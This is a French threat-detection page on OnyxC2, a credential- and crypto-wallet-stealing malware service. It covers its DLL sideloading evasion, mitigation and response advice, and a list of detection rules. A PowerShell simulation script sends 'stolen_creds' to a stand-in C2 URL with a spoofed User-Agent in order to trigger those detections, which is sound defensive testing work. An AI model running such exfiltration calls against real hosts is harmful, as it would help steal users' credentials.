OnyxC2 : Un Nouveau Voleur Ciblant 210 Applications
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
OnyxC2 est un stealer émergent de malware en tant que service conçu pour cibler les identifiants, les extensions d’authentification à deux facteurs et les portefeuilles de cryptomonnaie sur environ 210 applications. La plateforme offre une trousse à outils à vocation commerciale complète, comprenant un panneau de gestion, un générateur et une fonctionnalité d’accès à distance. Il repose également sur des méthodes d’évasion avancées, notamment le chargement de DLL avec des binaires signés surdimensionnés et des composants de charge utile cryptés.
Enquête
Les chercheurs de BlackFog ont examiné plusieurs échantillons d’OnyxC2 et ont découvert une méthode de chargement de DLL qui abuse d’un exécutable hôte signé en conjonction avec une DLL malveillante de plus de 120 Mo déguisée en bibliothèque graphique NVIDIA. L’analyse réseau a montré que le malware communiquait via HTTPS avec un point d’API backend spécifique. Les chercheurs ont également trouvé des superpositions cryptées intégrées dans la DLL, aidant le malware à éviter les analyses statiques simples.
Atténuation
Le déploiement de contrôles anti-exfiltration de données au niveau de l’endpoint peut aider à bloquer le trafic sortant non autorisé, quel que soit le processus utilisé. Les équipes de sécurité devraient surveiller les chargements de DLL suspects associés aux binaires signés et enquêter sur les fichiers inhabituellement volumineux apparaissant dans les chemins accessibles en écriture par l’utilisateur. Des politiques de contrôle des applications strictes et la surveillance des tâches planifiées non autorisées sont également recommandées.
Réponse
Si une activité OnyxC2 est détectée, isolez immédiatement le système affecté pour stopper le vol de données supplémentaire. Capturez un dump mémoire complet pour récupérer la charge utile décryptée et vérifiez la présence de sessions HVNC actives ou d’activité proxy SOCKS5. Passez en revue toutes les tâches planifiées créées récemment et inspectez les magasins d’identifiants de navigateur pour toute preuve de compromission.
Flux d’attaque
Détections
Commandement et Contrôle suspect par demande DNS de domaine de premier niveau (TLD) inhabituel (via dns)
Voir
IOCs (HashSha256) pour détecter : À l’intérieur d’OnyxC2 : Le nouveau stealer ciblant 210 applications
Voir
IOCs (SourceIP) pour détecter : À l’intérieur d’OnyxC2 : Le nouveau stealer ciblant 210 applications
Voir
IOCs (DestinationIP) pour détecter : À l’intérieur d’OnyxC2 : Le nouveau stealer ciblant 210 applications
Voir
Détection de communication C2 et anonymisation TOR du stealer OnyxC2 [Proxy]
Voir
Détection de l’Autorun et de l’activité de Keylogger dans une tâche planifiée OnyxC2 [Création de processus Windows]
Voir
Exécution de simulation
Prérequis : La vérification pré-vol des télémetries et du point de référence doit avoir été réussie.
Raisons : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer exactement la télémétrie attendue par la logique de détection. Des exemples abstraits ou non liés conduiront à un mauvais diagnostic.
-
Narratif des attaques & Commandes : L’adversaire cherche à exfiltrer des identifiants de navigateur volés. Pour éviter la détection par la surveillance de la sécurité réseau, il déploie un binaire Tor portable pour créer un tunnel anonymisé. Une fois le tunnel établi, le malware initie une connexion à son serveur de Commandement & Contrôle (C2). Pour se fondre dans le trafic web légitime, le malware falsifie son User-Agent pour apparaître comme « Cloudflare » et cible un point d’API spécifique hébergé derrière un proxy Cloudflare. Cette séquence est conçue pour déclencher la corrélation de la règle de détection de
torarguments en ligne de commande et le/backend/api/app.phpmodèle d’URL spécifique. -
Script de test de régression :
# Simulation de la communication du stealer OnyxC2 # 1. Simuler la présence de Tor (Créer un comportement de fichier/processus factice) # Dans un scénario réel, il s'agirait du tor.exe réel $TorPath = "$env:TEMPtor.exe" "Contenu binaire simulé de Tor" | Out-File -FilePath $TorPath # Créer un événement d'exécution de processus pour 'tor' via la ligne de commande Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo exécution du service tor" -WindowStyle Hidden # Pour s'assurer que la logique de détection 'command_line|contains: tor' frappe, # nous exécutons une commande qui inclut la chaîne 'tor' cmd.exe /c "echo initialisation du proxy tor..." # 2. Simuler la connexion réseau C2 # Nous utilisons PowerShell pour simuler une connexion réseau avec l'URL et le User-Agent spécifiques $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Tentative de communication C2 vers $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Commandes de nettoyage :
# Supprimer les artefacts simulés Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Nettoyage de la simulation terminé."